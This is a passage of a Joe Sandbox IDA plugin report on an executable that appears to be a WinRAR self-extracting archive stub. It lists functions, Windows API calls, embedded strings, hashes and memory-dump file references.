-el -s2 "-d%s" "-sp%s", xrefs: 00007FF731C9B719
runas, xrefs: 00007FF731C9B749

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Item$Message$_invalid_parameter_noinfo_noreturn$Send$DialogText$File$ErrorLast$CloseFindFocusViewWindow$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmap
String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
API String ID: 3376987105-2702805183
Opcode ID: f040698b65793e6d7f2921c5c019537af51ab54fa7a6e6cccf934c4893d0de37
Instruction ID: 1790b234002cc56f8929b4aa93f8a287ad86b64590e2b5879836b25abfe31d19
Opcode Fuzzy Hash: f040698b65793e6d7f2921c5c019537af51ab54fa7a6e6cccf934c4893d0de37
Instruction Fuzzy Hash: 65D2C462E0878265EB20FB65E8542F9E361FF86780FE04131D94D47AA5EFBCE544E720

Function 00007FF731C9CE08 Relevance: 65.0, APIs: 26, Strings: 10, Instructions: 1963windowfileCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF731C9D573
SendMessageW.USER32 ref: 00007FF731C9D5A6
SendMessageW.USER32 ref: 00007FF731C9D5D5
MoveFileW.KERNEL32 ref: 00007FF731C9DACB
MoveFileExW.KERNEL32 ref: 00007FF731C9DAE9
GetTempPathW.KERNEL32 ref: 00007FF731C9DBC9

Part of subcall function 00007FF731C71FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C71FFB

EndDialog.USER32 ref: 00007FF731C9DF4A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF731C9EE63
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9EE6F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9EE87
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9EE8D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9EE93
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9EE99
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9EE9F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9EEA5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9EEAB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9EEB1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9EEB7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9EEBD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9EEC3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9EEC9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9EECF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9EED5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9EEDB
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF731C9EEE7
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF731C9EEF3

Strings

<br>, xrefs: 00007FF731C9D65A, 00007FF731C9D669
@set:user, xrefs: 00007FF731C9DD16, 00007FF731C9DD25
Software\Microsoft\Windows\CurrentVersion, xrefs: 00007FF731C9D481
lnk, xrefs: 00007FF731C9E34A, 00007FF731C9E359
MAX, xrefs: 00007FF731C9EA02, 00007FF731C9EA11
HIDE, xrefs: 00007FF731C9E965, 00007FF731C9E974
ProgramFilesDir, xrefs: 00007FF731C9D470
.tmp, xrefs: 00007FF731C9DA05
.lnk, xrefs: 00007FF731C9E386, 00007FF731C9E395
MIN, xrefs: 00007FF731C9EA65, 00007FF731C9EA74

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$FileMessageMoveSend$DialogItemPathTemp
String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
API String ID: 3007431893-3916287355
Opcode ID: 818e76b5e157183c2655d10f8c5f0c039429fb36bdff72257209617f7d488c54
Instruction ID: bff35514618658291f44c0ccce2ad40a86be23f71c3f437f43f16fc297e3a99c
Opcode Fuzzy Hash: 818e76b5e157183c2655d10f8c5f0c039429fb36bdff72257209617f7d488c54
Instruction Fuzzy Hash: A113C272F04B82A8EB10EF64D8802FC67A1FB50798FA01535DA4D17AD9EFB8D594D360

Function 00007FF731CA06D4 Relevance: 45.9, APIs: 21, Strings: 5, Instructions: 380
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF731C8DF4C: GetModuleHandleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF731C8DF94
Part of subcall function 00007FF731C8DF4C: GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF731C8DFAC
Part of subcall function 00007FF731C8DF4C: GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF731C8DFD9

Part of subcall function 00007FF731C8629C: GetCurrentDirectoryW.KERNEL32 ref: 00007FF731C862B2
Part of subcall function 00007FF731C8629C: GetCurrentDirectoryW.KERNEL32 ref: 00007FF731C862EC

Part of subcall function 00007FF731C993EC: OleInitialize.OLE32 ref: 00007FF731C99406
Part of subcall function 00007FF731C993EC: SHGetMalloc.SHELL32 ref: 00007FF731C99454

GetCommandLineW.KERNEL32 ref: 00007FF731CA08EE
OpenFileMappingW.KERNEL32 ref: 00007FF731CA0987
MapViewOfFile.KERNEL32 ref: 00007FF731CA09B0
UnmapViewOfFile.KERNEL32 ref: 00007FF731CA09C6
MapViewOfFile.KERNEL32 ref: 00007FF731CA09E3
UnmapViewOfFile.KERNEL32 ref: 00007FF731CA0A4A
CloseHandle.KERNEL32 ref: 00007FF731CA0A53
SetEnvironmentVariableW.KERNEL32 ref: 00007FF731CA0B2D
GetLocalTime.KERNEL32 ref: 00007FF731CA0B38
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF731CA0B93
SetEnvironmentVariableW.KERNEL32 ref: 00007FF731CA0BA6
GetModuleHandleW.KERNEL32 ref: 00007FF731CA0BAE
LoadIconW.USER32 ref: 00007FF731CA0BCD
DialogBoxParamW.USER32 ref: 00007FF731CA0C36
Sleep.KERNEL32 ref: 00007FF731CA0C66
DeleteObject.GDI32 ref: 00007FF731CA0C8D
DeleteObject.GDI32 ref: 00007FF731CA0C9F
CloseHandle.KERNEL32 ref: 00007FF731CA0CE7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731CA0D57
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731CA0D5D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731CA0D63

Part of subcall function 00007FF731C9FC8C: SetEnvironmentVariableW.KERNEL32 ref: 00007FF731C9FCC3
Part of subcall function 00007FF731C9FC8C: SetEnvironmentVariableW.KERNEL32 ref: 00007FF731C9FD3C

Strings

STARTDLG, xrefs: 00007FF731CA0C25
sfxname, xrefs: 00007FF731CA0B1B
winrarsfxmappingfile.tmp, xrefs: 00007FF731CA0979
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00007FF731CA0B82
sfxstime, xrefs: 00007FF731CA0B9F

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 1048086575-3710569615
Opcode ID: 0228d48b430fbbc5536735ec76bcf2bafee8ef021e5fbde81c8a6567330422ab
Instruction ID: cc2525f7fc963430ab21d7a7546527c3bd1ca853f9e638aeb54358bfa545de40
Opcode Fuzzy Hash: 0228d48b430fbbc5536735ec76bcf2bafee8ef021e5fbde81c8a6567330422ab
Instruction Fuzzy Hash: 7312CB22E08782A5EB11FB24E8452BDE361FF84784FE05631DA9D47A95DFBCE150E360

Function 00007FF731C8A46C Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF731C8A4C4

Part of subcall function 00007FF731C90EE8: WideCharToMultiByte.KERNEL32 ref: 00007FF731C90F19

SetDlgItemTextW.USER32 ref: 00007FF731C8A533
GetWindowRect.USER32 ref: 00007FF731C8A56D
GetClientRect.USER32 ref: 00007FF731C8A57B
GetWindowLongPtrW.USER32 ref: 00007FF731C8A62C
GetWindowRect.USER32 ref: 00007FF731C8A672
SetWindowTextW.USER32 ref: 00007FF731C8A6AC
GetSystemMetrics.USER32 ref: 00007FF731C8A6B7
GetWindow.USER32 ref: 00007FF731C8A6C8
GetWindowRect.USER32 ref: 00007FF731C8A706
GetWindow.USER32 ref: 00007FF731C8A7C8

Strings

$%s:, xrefs: 00007FF731C8A4AF
CAPTION, xrefs: 00007FF731C8A68F

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
String ID: $%s:$CAPTION
API String ID: 2100155373-404845831
Opcode ID: f09754ff845102ccda79200273466886b6e7de95add5815e5c6e323da895e5c6
Instruction ID: 5708f34cf4f43424ce303b7596ee1ad5ed3f5cceba71cd7526abf37b14920a93
Opcode Fuzzy Hash: f09754ff845102ccda79200273466886b6e7de95add5815e5c6e323da895e5c6
Instruction Fuzzy Hash: 7291F632F186519AE718EF29E84066AE7A1FBC4B84FA05535EE4D47B58CF7CE805CB10

Function 00007FF731C985A4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 101
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32 ref: 00007FF731C985BD
SizeofResource.KERNEL32 ref: 00007FF731C985D9
LoadResource.KERNEL32 ref: 00007FF731C985F3
LockResource.KERNEL32 ref: 00007FF731C98605
GlobalAlloc.KERNELBASE ref: 00007FF731C98626
GlobalLock.KERNEL32 ref: 00007FF731C9863B
CreateStreamOnHGlobal.COMBASE ref: 00007FF731C98668
GdipAlloc.GDIPLUS ref: 00007FF731C9867E
GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF731C986E9
GlobalUnlock.KERNEL32 ref: 00007FF731C9870C
GlobalFree.KERNEL32 ref: 00007FF731C98715

Strings

PNG, xrefs: 00007FF731C985AF

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: fd8ee907c37a37ea721c4e5c6a3baa4bdc4dc7e79f3e600676f8c4fa2d46fae9
Instruction ID: e69c3383b4524b7c4d3b6540fa333413e7b4c571369ca2eb949460d4f9838028
Opcode Fuzzy Hash: fd8ee907c37a37ea721c4e5c6a3baa4bdc4dc7e79f3e600676f8c4fa2d46fae9
Instruction Fuzzy Hash: 9C414F25E19B46A1EF14EB56E444379E3A0BF88BD4FA44435DE0D873A4EFBCE4589320

Function 00007FF731C7F940 Relevance: 17.1, APIs: 8, Strings: 1, Instructions: 1396COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C811F1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C811F7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C811FD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C81203
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C81209
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C8120F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C81215
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C8121B

Strings

__tmp_reference_source_, xrefs: 00007FF731C7FCE2, 00007FF731C7FCF1

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: __tmp_reference_source_
API String ID: 3668304517-685763994
Opcode ID: f7f8a9fe111d1445b296415a6db48cbccd10df9cc401444a39226eebe3790364
Instruction ID: e50b457e0fbeeada209427a28317bb2fac4eda0d8c87125832c3609722dfb0dc
Opcode Fuzzy Hash: f7f8a9fe111d1445b296415a6db48cbccd10df9cc401444a39226eebe3790364
Instruction Fuzzy Hash: 57D28662E087C1A6EB64AB65D0803FEE7A1FB45784FA04132DB9D03AA5CFBCE455D710

Function 00007FF731C74840 Relevance: 12.1, APIs: 5, Strings: 1, Instructions: 1624COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C75125
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7512B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C75131
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C75E1E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C75E24

Strings

CMT, xrefs: 00007FF731C759BA

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: CMT
API String ID: 3668304517-2756464174
Opcode ID: 2415ac396bc376b709029b284e23b116a61fe08cc3dcee04032485c5ae55b9eb
Instruction ID: 237e4d0c3a14193679034b34f43759e582f0db5e4f8e3a3cff17ae8284be505b
Opcode Fuzzy Hash: 2415ac396bc376b709029b284e23b116a61fe08cc3dcee04032485c5ae55b9eb
Instruction Fuzzy Hash: 1FE20322F08682AAEB18EB35D4502FDA7A1FB45784FA04035DB5E43A96DFFCE455D320

Function 00007FF731C8407C Relevance: 10.7, APIs: 7, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 00007FF731C840CB
FindFirstFileW.KERNEL32 ref: 00007FF731C8411E
GetLastError.KERNEL32 ref: 00007FF731C8416F
FindNextFileW.KERNEL32 ref: 00007FF731C84197
GetLastError.KERNEL32 ref: 00007FF731C841A5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C842CF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C842D5

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
String ID:
API String ID: 474548282-0
Opcode ID: 083738887a80dfdd435d0b3a7adacdcf0c3f6e619cdef7a444a6c352ce5ad5db
Instruction ID: eef7743791482c8fd0faa6995ee6fca839a47367f3f33195fd861730030ee915
Opcode Fuzzy Hash: 083738887a80dfdd435d0b3a7adacdcf0c3f6e619cdef7a444a6c352ce5ad5db
Instruction Fuzzy Hash: F961D762F08642A5DB10EF68E4803ADA361FB857B4FA04331EAAD43AD8DFBCD544D710

Function 00007FF731C75E2C Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 586
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CMT, xrefs: 00007FF731C759BA, 00007FF731C7675B

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID:
String ID: CMT
API String ID: 0-2756464174
Opcode ID: a233297c88ebed2e631ec438d1cd10e1b0e3e5055da52990d200b0771bd9e9d4
Instruction ID: 2b5803c4f13d80cbb9a7f55dc16302a3e82f1d386fc93d50fd5ea78f68b6c1d9
Opcode Fuzzy Hash: a233297c88ebed2e631ec438d1cd10e1b0e3e5055da52990d200b0771bd9e9d4
Instruction Fuzzy Hash: A842E322F08682AAFB18EB74C1512FDB7A1FB51744FA00135DB5E53A96DFB8E518D320

Function 00007FF731C848E8 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID:
API String ID: 3340455307-0
Opcode ID: 17fec9accf37e8645c26856d3d4b9aa45065755fb291e857ccd25b31c37800ae
Instruction ID: 7e550885acc0f81905574fa68069bab386821fbdc923f862b33f4091238bff8a
Opcode Fuzzy Hash: 17fec9accf37e8645c26856d3d4b9aa45065755fb291e857ccd25b31c37800ae
Instruction Fuzzy Hash: 7B412722F1469296FB64EF21A9817BAA352FBC4784FA44034DE0E07F44DE7CE442D714

Function 00007FF731C8DF4C Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 440
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF731C8DF94
GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF731C8DFAC
GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF731C8DFD9
CreateFileW.KERNEL32 ref: 00007FF731C8E36C
SetFilePointer.KERNEL32 ref: 00007FF731C8E38A
ReadFile.KERNEL32 ref: 00007FF731C8E3B2

Part of subcall function 00007FF731C8DF4C: GetSystemDirectoryW.KERNEL32 ref: 00007FF731C8DD5B

CompareStringW.KERNELBASE ref: 00007FF731C8E4D5
CloseHandle.KERNEL32 ref: 00007FF731C8E46F

Part of subcall function 00007FF731C71FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C71FFB

Part of subcall function 00007FF731C85164: GetVersionExW.KERNEL32 ref: 00007FF731C85195

Part of subcall function 00007FF731C8DF4C: LoadLibraryExW.KERNELBASE ref: 00007FF731C8DE7B
Part of subcall function 00007FF731C8DF4C: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C8DF31
Part of subcall function 00007FF731C8DF4C: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C8DF37
Part of subcall function 00007FF731C8DF4C: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C8DF3D
Part of subcall function 00007FF731C8DF4C: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C8DF43

AllocConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF731C8E6C7
GetCurrentProcessId.KERNEL32(?,?,?,00000000,?), ref: 00007FF731C8E6D1
AttachConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF731C8E6D9
GetStdHandle.KERNEL32(?,?,?,00000000,?), ref: 00007FF731C8E6FC
WriteConsoleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF731C8E715
Sleep.KERNEL32(?,?,?,00000000,?), ref: 00007FF731C8E720
FreeConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF731C8E726
ExitProcess.KERNEL32 ref: 00007FF731C8E737

Strings

msasn1.dll, xrefs: 00007FF731C8E111
rsaenh.dll, xrefs: 00007FF731C8E023
ntmarta.dll, xrefs: 00007FF731C8E173
propsys.dll, xrefs: 00007FF731C8E229
mpr.dll, xrefs: 00007FF731C8E20D
SetDefaultDllDirectories, xrefs: 00007FF731C8DFCF
dwmapi.dll, xrefs: 00007FF731C8E039, 00007FF731C8E5DD
mlang.dll, xrefs: 00007FF731C8E237
userenv.dll, xrefs: 00007FF731C8E0D9
ws2_32.dll, xrefs: 00007FF731C8E07B
samcli.dll, xrefs: 00007FF731C8E245
srvcli.dll, xrefs: 00007FF731C8E19D
shell32.dll, xrefs: 00007FF731C8E13B
DXGIDebug.dll, xrefs: 00007FF731C8E002, 00007FF731C8E532
setupapi.dll, xrefs: 00007FF731C8E0BD
imageres.dll, xrefs: 00007FF731C8E1C7
uxtheme.dll, xrefs: 00007FF731C8E5E9
kernel32, xrefs: 00007FF731C8DF8D
shdocvw.dll, xrefs: 00007FF731C8E0F5
peerdist.dll, xrefs: 00007FF731C8E309
SSPICLI.DLL, xrefs: 00007FF731C8E018
profapi.dll, xrefs: 00007FF731C8E181
wintrust.dll, xrefs: 00007FF731C8E12D
crypt32.dll, xrefs: 00007FF731C8E103
XmlLite.dll, xrefs: 00007FF731C8E2B5
dhcpcsvc6.dll, xrefs: 00007FF731C8E299
comres.dll, xrefs: 00007FF731C8E070
dfscli.dll, xrefs: 00007FF731C8E26F
psapi.dll, xrefs: 00007FF731C8E091
UXTheme.dll, xrefs: 00007FF731C8E02E
oleaccrc.dll, xrefs: 00007FF731C8E165
aclui.dll, xrefs: 00007FF731C8E2ED
SetDllDirectoryW, xrefs: 00007FF731C8DFA2
cryptsp.dll, xrefs: 00007FF731C8E2D1
slc.dll, xrefs: 00007FF731C8E1B9
usp10.dll, xrefs: 00007FF731C8E05A
cryptui.dll, xrefs: 00007FF731C8E11F
WINNSI.DLL, xrefs: 00007FF731C8E1F1
ntshrui.dll, xrefs: 00007FF731C8E0A7
iphlpapi.DLL, xrefs: 00007FF731C8E1E3
atl.dll, xrefs: 00007FF731C8E0B2
dhcpcsvc.dll, xrefs: 00007FF731C8E2A7
RpcRtRemote.dll, xrefs: 00007FF731C8E2DF
lpk.dll, xrefs: 00007FF731C8E04F
